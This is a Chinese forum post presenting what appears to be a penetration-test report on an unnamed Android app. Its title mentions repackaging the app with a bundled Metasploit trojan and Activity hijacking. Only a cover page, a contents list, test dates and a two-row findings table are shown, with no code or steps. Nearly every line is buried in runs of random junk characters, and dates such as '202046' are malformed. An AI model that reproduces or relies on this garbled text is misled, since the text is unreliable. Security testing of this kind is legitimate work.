找回密码
 立即注册

QQ登录

只需一步,快速开始

欢迎中测联盟老会员回家,专门使用25年老域名强势回归
查看: 2170|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
; `; l8 e# z/ C0 S& I9 ~ M7 }0 G, M! j& G0 H9 {3 }. e) N8 }: ^# s1 X

3 C+ q: P9 W: x/ }8 n 8 Z% C2 P% Y8 r! h) d5 _; l0 {. r
7 S9 w; v, f* }5 y# {. E4 }2 d, ?6 u( u& r+ E

, ^9 V; u: P) C, D% q' `( K0 n4 A ]& l' c1 H
, l h0 @4 ^- V( [" z' O% K" G0 E1 H- H/ w7 ]( J' X

5 B3 {6 r( x; [, y5 L) { 2 {) v+ q" j- q: F( I6 G 文档编号:                ) P5 @4 Y4 ^& v; v: ?6 U # [ G3 r! s& e* w

7 J8 T6 V9 U3 I6 u; s: U* Y+ `" L6 s% L2 s, f5 ~4 W5 ]7 S3 V; p

+ m1 N3 Y" C* |$ l( q; `9 O $ ~$ Y# n# _3 d5 Q/ ?   ) }; x _9 \6 ? 5 @0 G( s, m, G+ v, ?4 u% b; m+ o

* M5 n. X+ T0 X7 C7 g7 ?% [# j* D4 Y6 Y- j$ Y

& F% O! e" A* ]% E$ R8 I( o" V+ X( S' [& `" b   " p, d% L8 A; |. n4 X9 s. ?3 R0 z; [- o! Z, e2 A" F- [

" A9 n) M8 E8 J$ e f. m6 \/ N: h" I% o+ t) w8 T& q! B

" b5 C0 e6 I3 @' K4 d8 D/ q6 c2 |6 ?& U* j' I! @! Q   ' }9 q# ?! F, K' s; U# ^ 7 f2 u- s# [- y& F, B7 R. w

) m. V7 s" u: }9 T: T2 d 5 r/ r+ T1 D& u( n+ S% u, {- m* k

" G, O' ^' A* O0 `! s # t" H2 |$ O& L& V) g   6 q' S7 F# H) W 1 V; w3 \/ ]0 i0 X) D0 c

; }. V+ b* o& l& Z# [- U c+ Z1 h$ t# ?; C) H

+ {9 K0 E0 b; K# F# @5 o4 y ; ^8 H8 ?3 p5 ~/ a1 c: s   / u2 }3 I1 k. {9 d' s3 `, \ / N0 F5 B+ w7 y9 y

, h. F9 f; a! G ' h8 k* k/ _$ [. |8 u' g0 j% y

9 o9 X2 y3 @0 @$ M # k! Q0 V* n. @# _3 N" _5 T, S 某某某APP渗透测试 , c% C( g: V, P ' Y1 M% H _, c7 l

! i! J" ?7 @( g' [ 8 M9 l* q0 }/ L" t P8 G, I

' K+ h/ @0 ]6 C/ C / P- d( O6 S/ `# h' Q0 I5 }   8 p- J+ ^0 T6 K- ~4 \4 @: j2 W ( f* t7 N5 I# p4 N, z- X- n

5 D a5 M, T" j( Y! P : k7 U$ c5 @7 j1 h0 ^) }

0 `5 P5 }. c0 u* ^ h. ^8 H & H2 G" R& v9 c4 R   5 s- j+ ^ b/ K7 K2 s+ _" ^1 [. U- @2 u8 ^! P8 Z

* i# K8 b* o+ v' h9 R 4 D# V& z6 P( m

. \3 |* k7 o2 T- D& c , v0 O- D$ c6 M4 t; `   * U& |5 B8 l* ` ) C5 I. ?# S& n% }2 c! U( s

, {1 o+ ~6 `; Y* @( t8 y' x7 o/ k7 S% {1 q. a0 I

& l Q+ O# \9 z1 m8 ^: B' @3 A, P6 |' j5 i0 N4 I) K   * Z+ a, V( B. B3 r) D9 q # O, a9 d- B \. _: ?" [

5 f/ z S9 z! F& y" u8 g& K2 q4 c( K5 w% x6 S/ ^

. p% L! Q5 h! ^7 g; Z - M5 F$ c' ~+ O# i5 l @ 技 术 报 告 * c7 e+ Q8 F" q" i - M3 u; V4 N8 G- _6 s

2 ~7 o& U0 |0 u / h1 A1 Z" T+ _; w8 N. t% A

6 e8 X6 ?, Y/ l) ~ $ t" f: D9 `3 P* x6 t0 {   - P, ]) T7 p+ e( V 4 w+ h& t% v: x4 D

- q- E3 T* K/ e- }) P! W+ O# o; D+ _* Z$ Z& n& t: s1 Q

& {, ~0 ?6 z4 F( g ( H Y3 D1 P6 ^4 t* e+ |" x& {   7 O: t/ P$ s# G # n6 ?( i# E; N4 R) f+ d

0 a) [9 B- k- U8 F % y- R/ b& J. w" @& {5 W8 \/ V

, o8 e! D3 f5 _' u: z5 k1 r, d" O# a 1 h# R" Z% ~7 T* n9 S2 o+ O' _' S0 \   . F. s0 L, V n# V7 ~4 c " w) b* R$ G& K: h- k1 j

1 o* `& T* s$ u9 r3 f% y: n' a+ B" D) g/ a0 u, F

6 J5 s8 L5 u# x9 M - \! S. c: ]9 V5 z1 ]   & l( l6 f7 M6 U% f$ u; O, s( `% l$ ^; C- `

( g6 K0 k* T+ Y7 p, ^/ w # c0 u% B: N: S2 s

1 p3 T( s6 Z$ k6 j O, {/ m 1 [* u9 }6 {) r7 o: P# N5 F   : x9 m8 e. c) h# |! p7 F4 @& r& Z+ w

9 h% i+ O, d$ }8 N h; E 9 W2 ]0 M: Z' R# n2 n& B

. ?# x( t- w6 m% k9 D& Z$ L% @: [0 W- d1 R   6 J7 [8 Z" U. {) H" N4 G ! N0 e' H. X: N4 v* U( \: f2 ^3 R

9 q& b Y& K e2 Z* v/ w' v, j 7 T3 W- g, U) A Q) R% X

9 |5 \" u q1 y* U8 i : i/ \* J, Y( Q3 I9 A# V   0 s) R4 q: H7 E- b# y # ~3 {: H6 F' Z

# x+ w; l: L8 W( U9 J; o 2 n. L( |- ?7 B( {: @- j; o# s

$ D3 d. O$ I) L2 d$ o! y3 \/ U. m! U" h2 }# t   " t: |. b! b R# _3 d/ n8 T * U( x4 w2 w8 E

$ X' d/ \3 B7 @) [4 Y. z1 u ! i' q: ~7 W9 T2 O- ?/ Q. A

# ?+ x0 D" @) s' ~& t 0 L( i) Q l6 t$ w# x0 S; Q   . O) @. h+ \9 r- @ ! ~ ?) m$ _/ ?1 M

7 ^2 A; |8 i+ ^& J+ d 2 j( F- O7 \& U

4 d& u9 d$ ^* m) e2 m3 X. H7 F 3 I" H9 c/ V7 g6 w. m   7 l4 I8 j! k) I/ E, e/ J5 R8 f

( Y7 z% ]' x+ N% ~$ p- { / p0 p9 Q3 v% M6 G* y

1 Z9 {' j2 [+ j 3 o" l1 K5 b- U% N4 B   # V( d1 [- C- H : e4 W! z' f3 ~& r- S2 }; d' }0 j

" k, R R( G/ M6 _ 8 @" u/ Z0 x' ^

7 B. K7 {" b+ x' U/ l8 n9 o; v7 ~3 c D# N/ P! Z6 Z8 c   + v9 p# X8 n* f - m' Y. p( U" K5 `( v

: T! F$ a4 O8 J- H: i 3 d+ s9 {* o1 s2 {6 I; H

3 }0 P* W- \8 S! w' n! l% c$ j! L 1 k( x4 K, A. B: Y+ y   , C( m! V8 b; k " L) |) { R F( @; p, o9 H ?

! F) @( u; H7 G : k, _ N9 n1 C l0 [4 \

" `* S( u3 X+ N' @6 M ! O( e P4 U9 N8 _   6 F9 C" r7 r( \) h( \$ ]% j, C* ~1 O; w" `+ u

) U) K, i1 M5 _5 z0 q8 Q 0 K2 O% Z: u' C8 W) t5 X e W

( S4 M1 A; E k9 T! ^0 ^; c! f' c 9 K# ?# m* s- T" q: P   : c, M v, b$ k 0 L& s) U: h9 E+ U

* M, Q" k) G) P/ ~5 C0 B$ F! K ; E/ O* ^2 D- W+ `

* S7 C, E3 t- _1 G. p0 b6 T- h3 Y% J/ R3 N1 e& B7 |' y   5 b3 ~& ?+ h+ N! k; ` " ?( k$ r+ s4 J' U2 C8 N( D1 z

5 H" f9 R( v% T) D' E 0 W! F/ o" X# ^! S' j! Q& B; ?* G

1 B9 o {4 P+ x* \+ t- |' ?) Q ! B6 J$ b! [* l4 |9 m( @   - p) w k% P' x% L: a; K + v+ }/ w& x0 I* j/ ]! W& ]: M

1 E4 l1 P$ I8 _2 Z4 h9 A8 s) u / L1 }' Q5 k6 G q! b9 n# k

* Y, B+ i( |( Y2 L / f, Z3 V& }5 |1 |* \# T7 \1 q3 Q   6 ?3 b0 d+ O' H0 F1 o! c4 V ' [# F; F B- @. {& l3 Q4 e

, I2 h) @$ ?& l) i% D % S1 t: {3 y% s8 a5 j! i9 b+ j

" R2 i+ d2 ]& O# {2 F7 B2 J0 a) @ / y) {) T9 r! Z 二〇二〇年 8 o, m0 a) C) h) \& {$ B; w6 O0 n0 J4 Q+ L

7 a ]( k2 z, M2 [5 Q/ H, j3 ~. j/ S, X G( W8 I$ `
* @7 Y: u u! ]0 F/ I& K : a6 C9 ?4 }& S3 Q
: F$ I P; g* i " y% C/ D* j! {
; u( G) S0 K; V" z) J% f* b& Y# U + d( |9 q5 i" ]) V8 X
' L% {3 \3 n7 G1 m0 N( E, O$ X0 c0 K( m( m/ B
/ l; k5 s/ p- p" C5 q % l. C) ^4 R9 V+ N$ c7 `
# l% {+ A, F( S" A3 T# `( Q9 ^ * x ^1 U3 v$ T0 I: S# _
: P6 c' z0 ^2 j9 L) O2 n$ R" ? * @; B0 v' W, a, S9 N3 e
3 w4 ~) r% D& ]2 d! h: z% I 5 Y2 s* H3 ]. ?2 `$ [( V

0 f4 ^2 A* a0 g q* g+ x3 F7 ~ $ P* F5 {+ y+ b 目 录 ( a: T- `$ G( w) }1 l% s + V! N' D# i0 ]2 A# J3 \) n6 D0 _

# D4 a' u- }3 w( F" l, i/ w1 E: E' T( {! P, w6 Y, {) I ) m, v. o' b5 {+ U6 _: p1 w6 [+ c( g 4 [1 d: Q: |/ E# _/ `

+ ~# T# x# s) e% K" y2 _; _# ~) ? ( I' {2 E, x; A1 k S   - s2 ^9 u- ^# Q& j3 C& F; m$ X" O. ~5 J- X4 g; ~8 k! f! ]

3 L; I9 d3 D' u 8 W/ _5 P, {* J8 v% ]

$ Q, B8 U3 O4 f, l3 I5 }, s d5 \ i3 A: S 1 概述... 3 . R; i7 [* G. C' I& K1 A / j2 R# `* ?8 J8 p

/ q& v, L8 H2 I, L0 z / Z. E0 k: E5 y% l6 D, T/ w7 P4 Z/ g

, g9 w( X$ I) c' ?6 ^+ B , f7 S* m" h& | l9 c5 [/ a' N5 p1 ] 1.2测试时间... 3 # M# e8 A# h5 d" V" ~$ ]% @9 _ 4 K6 }8 M+ K8 l# W* Z- v* h

) U) w% z4 b6 E- J- H . q6 Z* ?$ s4 b: v, Z4 D

# @6 g x7 z/ T: Z, M/ W& r ! K7 F' T8 j: j: C 1.3测试对象... 3 - E; |! t0 a" N2 q - c& C1 C% a7 w

5 k9 f! Y K1 `& K5 L) [0 u4 _ 5 P8 _# i8 q+ C( r& d0 i

: T. Q! d8 e1 i% R9 [9 x ( x5 p: r# p/ @' P a1 K 1.4测试结果... 3 & {$ w, q+ T0 \, N1 P: U 2 j' F1 y1 C/ a

' Z: q' b* u3 l: M% J& T0 K' B6 n5 b! _6 n

0 {: D2 R7 d6 R0 A8 [9 R9 C. Q2 C& Z/ F; z# ^9 R& y 2 检测结果... 4 0 b6 W9 T$ \8 C: D0 o" _ ~+ U3 }$ W" W- i

* j' u: J) n' t. p L# L1 q ?" X+ A, G" P- _

' [2 y* ~) ~# I. H: m# e * _4 U1 G4 l& H% f 2.1 某某某... 4 0 U9 G. v. Q4 z. j6 N; V * @" B0 w- v. q2 l, W* X# n0 X

6 L. b: j: a5 C9 y; H- F- F9 G+ k / D9 X$ w( M1 r. H4 R R8 J6 K

. o% X q# v- o1 _- G) y5 Q- o- k' ^+ x6 y; q 2.1.1检测目标... 4 ( D) }( Y- i3 q1 D, C$ f, R; | 3 l% D; {) l8 y4 B! f

9 J! G2 ^7 n) u1 D7 ], H$ Q- y% i ; E4 ]: x5 a J- A$ A

# e J6 t" Z& d: A9 }6 w 8 M! }% y) e0 n3 Y, H 2.1.2检测结果... 4 # t& F8 b7 P8 f , J+ r; w, E+ l' i! T" N9 C

" G7 Q7 [) [6 i4 d1 d/ d 3 Q+ C' l! t* {$ `. l

( C" l @4 X$ o5 W& q 7 p9 [$ r' b" I) O N 2.1.2.1. 4 ! T/ W8 \- E. x/ ~7 f- P0 V5 H& X2 S$ w& ]5 ^

2 q/ T" k2 S" E4 B3 n! E& k 9 P* o0 S. h9 w7 l

4 l/ H* E2 Q3 \ * q0 O- q3 ]2 u 2.1.2.2. 6 " B- E" e/ N, b4 p% k) ~0 \1 c( B4 Q2 j- ]

. Z5 J( e s! @: b0 `5 V& x- H7 t$ T* s

7 ^: Q: @& H5 L" t$ ^ 8 K7 e* G5 h( D9 ~. ^' X 3 ^* E5 J h5 K ! j1 R5 u) j# }$ d' w' N' r

) s" u8 s# }& v9 O7 n" M6 @* t1 } p* u% {) r
3 e# p* {. _; L" T7 W & R" `* E0 c" }4 m& C9 m7 |7 B
; s$ z7 ?/ B. L) X$ Y0 P + D8 p. Z) I3 Y1 Q5 T: V- b9 l
) B8 m9 f& Q5 ?; Y4 l ' B" u6 b \2 x3 _" x5 L/ w0 ^! W
! a8 V' |" L, \$ v0 i + b- b q) Q4 g( H) @9 J! L! U- b# _

; V, i, \ O) f , i; K I. C8 G. ~% ^ 1 概述 0 Q) e8 q. [! Y# W% P9 P1 X2 l% K4 E# W5 t

. ~* o" u8 m/ {7 v2 p* z7 B( m/ B" A [. r, q C: k

! N, @4 m/ g6 q( u/ r: t R8 b2 s1 j6 G) T! V1 f 1.2测试时间 & c+ p8 Z$ D8 \: |1 E" a( R+ I7 u& M$ I* ^

$ | m: ~% Z( b0 v 5 k7 h/ C4 q8 ] h& v* b' K5 D6 [ : [" Q0 v& ~1 y# X) H8 O, ^6 m4 S6 @6 X1 {. A* U u0 i9 Y; ?. y5 G, E, R7 |; }7 d4 [" ^0 Y6 h/ S v9 g, o# \& W/ G! S9 C3 i: [" k/ Y. |7 u+ w& \+ \$ V6 a1 z9 _# X* V, y4 Y9 u( E& I5 p2 {- f/ T7 P' z( o( Y; ^8 x+ g3 o- j5 ]7 |3 Y3 q& L' r* r5 \ v# ~5 Z' x5 m5 k% e5 c: G6 ?* T! r; v, ^: C" W+ O) }5 _. j9 J5 z; ^4 }4 ?1 \% ~6 Y& [" z8 W: Q1 B+ {7 ]; a% ^7 L( h3 T8 ]: Z7 U1 x8 [3 I" S0 q0 `% U, `2 |+ R6 Q2 U) q( y. S, [0 c0 i1 U8 K3 ?% f* e; R* ~7 M O( j+ {5 r4 C1 W% e/ Y2 E/ |1 U2 |/ A; h: n! k0 ^. l1 L' q7 P6 W# B! A c T1 P8 G; V( b. b& V3 |8 H$ M# D+ J' k1 A, s7 o9 R3 ]4 r, ]) R0 b2 y _1 v. h9 p" R& [ I) y' w8 j" T5 S4 s8 y& U/ X8 ^# Z" { V7 g; B7 i+ O: m4 h3 F8 W4 e% G' z. c) `; Q0 n$ C; f6 `+ ?& @5 o0 ~
' U. H7 q8 R9 f% B+ ?4 ]3 t 2 ^2 Q* h y0 e

' o: p& p6 ^9 Z: G 0 N5 w! p+ U5 L, N! {. P 渗透测试时间 Y$ h& j ~1 h 0 i# `6 Z) I; C0 u; t( S

( A3 `7 x- u4 W& g * X, |( k4 e) O! g
2 W1 R6 t' R8 }* K1 V+ @! A % o) C4 i- P/ V

8 L/ w& q8 ~: h) a( F9 @; R% h% y4 F6 c9 _( x$ j 起始时间 8 f. N- q) H0 V7 U8 g1 B : n. q P: `1 e' l7 R

; i$ _8 s8 _! `- H 0 ^" m# f4 X% a% V [9 a7 _
% {. L- s& s, S% G" R+ ^$ H2 r" ~: `; ^# t- P* j9 T

3 l! m+ n# Z$ I e + d1 C) }3 u# W; p 202046 % W' l! j) y( X5 a/ U4 D# r( p- n$ t2 ~ 0 b9 W" O1 P; J

: V. {3 v5 e _0 I [8 K) k' h 8 K- s/ J$ t$ u$ s
+ [ ]8 o) a5 d5 @9 e# |: r4 ^# H" G! c$ Y& G/ b$ Y

. k' W6 b5 X6 ^# T9 v, o; S0 n 8 z3 G3 v- `& [3 m o# c 结束时间 5 E6 s+ R A9 H0 ^5 h8 M % C2 G% h ]& y' s' v1 ?7 m" M' X

. i2 S' l4 L4 T 5 D5 P: t, P |/ `7 x' E
" s9 K, ~1 @8 K3 N( o ' @3 L2 D% ~" C3 W* ~5 Z

+ }$ q- g9 b2 k$ L/ b# Z4 v% S X5 A, |, Y5 v) L 202049 & x; w1 y ~- T' T% N. h ) _' K& Q9 X$ F$ q# L9 e3 X

1 S0 [# G% h; b9 J' I( W8 @* H9 R$ L) Y2 n! S1 L
5 |# o) Y8 ? A6 ]5 p " H6 u5 J/ d |0 e) f% D

1 X; ^/ t1 N0 C0 ^4 q ) _7 _3 t% T% G' ~ 1.3测试对象 1 E8 \. w. J( m7 R & L5 J( {' s' A7 f5 f" f

7 m9 D$ q2 g) d4 s/ l% C" @! D V6 h" O) [" b- d6 w! p& Y

* P: e7 m3 a3 k: F 5 v7 h( z! |5 b' _- i A0 V' O& n 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 0 N5 }( X" j3 r) h9 a& J: o: [# y. I ' W% t) q# F0 F3 b; B& ~" B8 p4 f

% P6 ]1 u! C- ?5 t& e* ?6 ^ Y 9 o( o( ]% C! V! ^

1 ^0 J" Q" b V: d. j3 x0 @$ D7 a/ @5 U8 T' K `* g 1-1 检测对象 / @' C. b" J* J4 Q: B3 n : O. I# B7 s8 R( U8 E5 L$ ?, s

" O; `( R5 {* {' A/ \; M% B# d5 A# V$ o9 u3 G( V / k9 e. L* W( `) f4 y2 Q! m. H: L, q& ?1 @* X* x& F$ J& c0 q- n8 _1 {# @0 M, s' s3 @- \: B/ p- C! p# @9 j1 o. j' b$ Z$ m4 J& v3 C( w! k- K2 m9 O5 b- {% y: m$ O3 {6 Y+ n0 x5 m _( |+ G* u/ y4 B) t0 C! \+ [3 z1 J1 L* ]) L7 q( s) q. @* g: p; T9 z6 }4 m" e" ]) s1 U% ]; }+ q. B: y3 I* F' K) U, I5 K5 K* Y. P( r m# J$ d: i! {7 }7 c: t9 ]; g3 K! s% J- Q/ u2 k" @7 w+ m" N6 \2 t; ~; M' X4 S: P3 r) X: Y+ N% b4 @5 y |! q) G' w, D0 w$ y; ]/ m! N: B4 {0 j/ d# U; Z( N, T' J( \6 V! n- q: U. _& r5 W7 ?1 y4 e9 `- Y' }9 `: P8 f. N- x' {) v7 n6 |9 n, R- u) ^3 }5 X- P! n7 ]9 O5 z t" s( V/ v# }5 x- F2 C. ]2 t+ A, d( J' v3 U0 {# O+ ]2 J) ]. O5 K% o8 n+ c* K1 h3 I- @6 K% ^% m+ w1 H4 C( y( D2 l p7 A) r: d
: d( f3 d7 R- ]3 p1 k' a" i" N0 ^. I' \" U3 D8 n- f+ T9 w, g& r

6 h% Z) J( i& @4 U) I5 C: N* D 9 t$ \" v5 m4 \/ h# v# ]5 S 序号 , t1 }( i6 Y5 p& }4 {4 x b& O2 j. u' q, ?

3 u' R; P' @: a+ q+ T) C( [: F $ D0 N* d: D+ L, G' v6 r
. y; f7 L. D% p# {" r 6 f7 i! g3 t* n$ c, _

/ b: \1 D: d' y8 x- ~8 P 4 N6 f f: N8 K 测试对象 - E$ w- e* A9 \3 ]: A ) E7 b% D7 p! Z8 i/ z

8 n% Z3 T/ ?5 U( d7 g) E# Q $ d' T0 g- o0 U) T: i0 Y
# M2 K/ @3 p, E0 h( t, _" R) v $ \) t9 J: o' A6 W# J, h2 K

4 Y! @% ~6 `1 L, D/ U7 K+ \, B . R/ r; L X- r) g: P+ V+ f 测试地址 0 z' p! M% I1 v \8 a, P , } g0 O, m8 Y# q C1 s

2 t5 [) s C/ A; M( a ?: w; h$ h+ ^8 F% W+ C$ h1 p
2 p, M) a, D" C: D% ^6 x! l/ N' o. r, t( f' O3 {

$ N r! r) k7 A1 _5 [5 D# T + J: o6 H: `4 H! V# _ v 安全漏洞 ; W- _, f1 c8 o0 {+ ~0 H+ [9 C2 L0 E1 f, B3 h' H* A

) ?# c: k* Y: Q5 D/ x% [3 E. X# m1 b& T
C! G: P1 p; r- b. a ( T; E+ p* U/ P

/ t: ~* J: l/ r2 d, } z) d+ [$ f6 V/ d% f% X 1 # t w5 B `6 R) {9 i * S- b/ P4 [4 V2 t

9 k' f9 k6 C# o8 d : J; ~" ?5 T. \7 ?1 E: F- r
2 ?* b: N& p2 m* Y, ~ ) ^) W0 }* J) E

1 a$ R& f1 M. w/ h) Y+ @. H * V4 m+ ?. U8 S7 [; _' {* | 某某某安卓APP 4 z, P- O9 F0 a. c1 `# V) c & P6 @4 m+ R! @6 ^4 G1 n8 p' k

. J6 G* @/ ~ u - w$ V! B/ Z) ~) B. i
$ v' ?: [& v0 m% c; f( E# f7 D4 F# {3 ]% z3 V/ ]

3 Y. A$ X6 W" u5 A* |9 ~ , f% z! I5 b, i7 q+ k- _5 q   7 k" L" ]3 H% @+ h8 c; S: F5 |& |6 Q L) w& J. s8 s9 U* Z5 B) p7 D

, i; |% O$ g% N0 y9 j9 L+ S& n, R* y) x, {& ?+ z
% L G' d2 G1 `$ J C 5 B9 |: I+ H# O, [

. D" u2 ?+ H+ N5 }4 k. t9 H% D4 O4 { ^0 l+ C 2 1 G- r# V. l$ U9 P. ^( s " y: n+ U1 A4 w3 L$ a

U9 k9 Q& {. ~: g2 k* F/ l3 h - o: I0 W2 W$ ~/ m+ b
$ J2 l# ?4 n9 `" [6 q - t% k V2 h' x& d: b% Z: Z

* j- ?0 E A- V* H8 Q# N B; |) i- c+ q5 {% [ 1.4测试结果 6 t w1 L9 x$ D) p7 x8 I ) \ U/ t4 H; R& ]) U

5 X' z: Q% z% P9 Q 3 S* h# G# I2 S

* h$ d! \( @. R2 s# C! \ # S# T; @: U, D 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ) a- W j; c2 O( K O7 F 2 |8 b7 T8 s3 a

% x4 s( R/ R5 u6 U6 j" l' f . T+ G/ w& N8 g+ l6 \* S

5 e; P! S5 [7 W0 n; [3 z; I6 @# F4 j$ o: \" }! l! o   O, ^5 }1 q# J+ Z V5 S ( G1 S/ R7 s) d9 r' ]

" }( `" u+ ?" |( P9 j$ ?# R' `% y1 t- ^1 Z% Y, V
4 B" X; r1 c7 t( n, h6 r! K6 E" r i" H7 B0 m; j! @ 0 O4 j) ~- i5 O7 q) L6 I& `; Y% u, M6 Y* S/ `6 X) g! {3 p9 V* l5 }8 \, _# L* [$ G' }( A' A# j+ v' B8 s3 u7 {3 K9 d {3 m/ }: d: j4 u9 B: k5 E6 {- J/ b0 c! ?$ J; Q4 ~6 ~1 L( v5 c- q P* T8 k3 x4 @) Y# C+ N4 @! [4 T7 M, ]. U# b% r8 O$ ]9 p: b$ Q, O1 x# V$ t0 \. C- N, N s7 ?1 v) K# @2 c( P; ~) y. i* C( r2 j `6 E4 H8 L, X; v# b, a# g, v% |! \) \( ~" d. I- j$ C$ f( y! _& z& d- j9 V/ |* t! L7 q% ?# Y1 O& ?% h" I: e' E1 J7 p2 N+ b8 S+ W) b. l# z; ~4 I% m" C& `1 G& j3 O( F0 |4 ^7 Z' c. F* T2 N, Y* S4 i- B2 I1 N2 i. w2 L1 }; d5 p ^. ^ |8 S7 j& k2 s" B& g$ r1 J4 L" @3 N& C7 k. M- I! m8 u# l0 [; b' \% p3 r$ n" V% I4 {0 K4 W! a0 l4 A8 ]* |4 o, C! k4 t2 N! A' }9 v6 C+ w9 O! c1 \3 K# K& e, H4 l. D t1 p' i8 d0 X2 E: @. G7 F9 ?( C+ o2 c3 ~$ h: C. d4 v, |1 J) B5 L) _" ~0 a$ |3 @7 ?% T. z6 B) |; h( ]+ M) \- w2 S& t! T2 ^* P! o* L4 p- g$ @- ~1 D5 q, t0 t2 q6 g. L- K' O0 B l5 M. F: m; ], r; |7 t& y3 K- N8 A% X0 `$ m" J5 Z8 h" a8 k7 X# a+ P4 J; i3 [9 D s9 ?* o7 h8 n$ E) H! C' }' C" F( Z- |! M! s& g4 M, h. C5 n/ H9 S, \; a# a) ?) V8 N* O0 {) k' y5 T6 g2 k' r+ W) h2 w$ q9 b- s3 I5 A# i% ?! F5 `' v& ?7 D/ Y0 G j- n2 B9 }. d
# L* Y# f- \- ]) D* E1 e0 Y: O5 R ( Y9 w9 B2 F2 }! O

1 A) u+ V3 d2 i) _ ) J2 _& |! E" n- B4 [ 序号 4 i2 k- x1 q& [5 H8 ~7 q' v ' ?7 k! p: @1 t) N0 i

4 l5 e2 @& ? }' x2 M5 ?5 o : P I8 \9 Y- g u" j: M
" \ d/ V, a; X ) B5 R& c# h& j" D- Q7 v

* c3 X! C$ R- G6 o! W% u* C $ S6 B3 N4 y* Q" o- `( t6 n7 k 系统名称 % l! v7 E3 c) Y1 E0 V ; L! l* _, j6 I: t4 P

4 i" L- G: Q2 c 7 P# M A/ d8 S# x+ M
R$ ]6 r4 E! P; F' _ + P: E/ }+ u7 [

. j% {3 g# G! H 4 A% z/ N( Z8 I5 _$ E; I: n& S 漏洞名称 / H/ m6 _( _, Z0 c& Y 9 y6 \' p' x7 M# @" [3 n4 H+ r

: X4 a0 r; Z9 M) ]1 M& ?& Q$ W* R! s' k' O! R1 G9 J* f( G
u, f4 P/ e) |. c; Z0 l7 W7 s. A: I! H; S

2 B% P% D, v7 [6 @8 ` p1 n1 u * `0 l5 t1 l- G/ T 漏洞危害 3 ?& e6 w' e4 T0 Z/ q % W3 t' s1 D& F" B. m, K

- r6 C. y8 s7 x, k1 ]. F: I6 x! {) [) k
3 ]$ Y- J& Q1 v6 } - y! J0 D# z3 ?+ l4 y/ o

; t4 J7 @6 y1 G0 p/ `" F: } 4 p; p7 N7 A0 m/ [ 修复结果 9 K- t4 r- Q6 n; v8 e6 y # `) G1 C: V9 S: E

9 m! q `$ O3 i( i 0 K u3 l% `( v. q6 _( v1 j, P c
, C4 b% \2 Z% C* W7 U) A / `+ ?$ \6 g9 g6 s6 r) B o4 z

0 W ^1 r) r5 j! s# C0 e7 [, z# f: T 1 2 S( y2 f7 ~" l 5 v/ D0 C3 {- Y' c

8 ?6 ^0 C0 a' s. M $ v) p% }% O* G3 y
) M: h1 t& M8 V8 B, s4 c6 k# s) B 5 g+ K# h( _7 l5 d# O! I: I( l; E

6 G$ n- L# E" P + a4 s5 U& B" n- m8 u" a4 O 某某某某某某APP , y8 R; o, E: c. R4 V 7 N& p$ t0 r) f: k5 y

; W( u6 T5 d! I 6 [# s2 f! t: s# ^
4 Z* N, w/ X3 ?0 q2 { ! e1 v9 @: _& y$ @" b

; Z4 M" z, R: L4 }% H ! E: Y: K f; w! m Activity 劫持 9 ~- w& O* \) O w+ P( z* m4 T5 V + Y1 P: }1 F3 e6 y6 ^' y

; t/ F/ m" e$ `9 |4 V/ Z9 l [4 [0 o ]" t

3 O( o* O9 A& }' d 2 P9 F. e. u @1 l0 b: o   " ~6 @# ^ Z! d% T/ T7 q4 B . z/ y4 Y+ W, E: Q

% Z. C7 c. p6 G0 ^) j9 ]; z( ^' V) E 5 f3 F# n) }) ~# c+ N+ ?
" R, Y2 G0 j4 u x s& R ! p: a% a% \& c$ f6 [/ q

7 E+ ]9 C7 v! ` # W, J, B: X) `5 d $ S1 o6 r3 M/ y" W- E' I 0 L% c+ @: w% l' z

0 v2 F3 S& F% c, \1 |" `4 B& _. N
' @. M" M4 D4 C( I , W; Y0 K) Q: Z) U

% r0 b& x8 [1 A. D D $ h0 `1 ~5 t5 I8 x   ' x* \* e# D0 z/ K4 D5 u - K# @' s5 I9 E2 v# j) I: J

) ]5 x6 a1 I$ S, F) _7 L/ r9 T1 }7 h& W; X0 ^5 j t' Q7 _
) J2 z$ I! e9 }) f & w7 n& b; ~5 R

2 H& Z+ v0 V2 k3 h( H8 D" N5 v$ Y Q3 h, t 2 7 I/ ]9 U+ `. Z2 C* {0 G: w" P. Z; f3 I; u+ A" ~) i6 u

S6 ^/ z" X3 B. O0 ]& A8 c 6 \+ P4 T8 b7 Y# P! e7 j( B
- o6 c$ G% W& w: z! _+ A, y. D( v0 a) ^# d

# N b( W& V# R3 D* a: R2 g* G# W# [* S( C 某某某某某某APP 3 T9 x( ?" b; ` ( o4 F+ x4 t' r4 N3 a6 z: ^

3 L/ b( a3 r v6 u a5 m0 d; g- [' a2 ^9 w; d
0 s: s; C+ M" G3 d: A+ V5 R& C1 f: n9 W! ~$ |0 q; R) P$ C

6 N8 j; ]" G& {$ [- w % M6 m( n5 M1 `( ] 反编译二次打包捆绑木马、篡改APP代码 2 @; d, [: F& h7 Y1 J$ m: r. p1 j: m0 V; e' f: F' |5 |: S* Z! }) V

) F9 U6 r% B2 P# O0 l / Q# a- S, N8 p, G
# U; n6 X0 F( k: c# a$ [4 _5 R; O 5 v. w' v) A5 ~7 E L

2 x3 L7 T% q s1 z/ T0 q! |/ L' H# z+ F2 e$ V! n6 u' p 7 ~7 Z; o9 {# O9 L$ x7 B4 Y# U4 a } U1 u & M. P9 d! J" o" t. c$ V

* X9 m% b1 Z9 R0 i4 W * o" ^5 y& y5 d* y
3 N( `. o1 h/ S* f + n4 [' _1 {, ]

3 ?9 e1 F: y# b; ]' _/ ~8 A: P1 D5 t4 [   4 ^; W5 W- ]6 s/ C! c5 E 1 M2 ^% I% y8 K: D0 e

9 }; y" }$ |8 F0 e; F1 _8 ?9 p$ d& s9 r& e5 q0 U5 V
( k# n8 q t- [/ W8 ^3 n6 x5 s0 F i! x6 r0 d3 w* k; m
; t. N- A9 _& e # Q1 j6 t/ ~, N6 J1 P, p

, p( P- X: [0 ~5 q* e & j9 b8 Q4 e1 J7 b0 A' J9 D& d* Z   0 e( y/ K/ R2 o: J! R, I' H" g" C. R% m9 M* V; p- o6 Z; U' H

7 M! F2 [) p1 K' } : r, P; U$ p8 f2 n b; |7 p

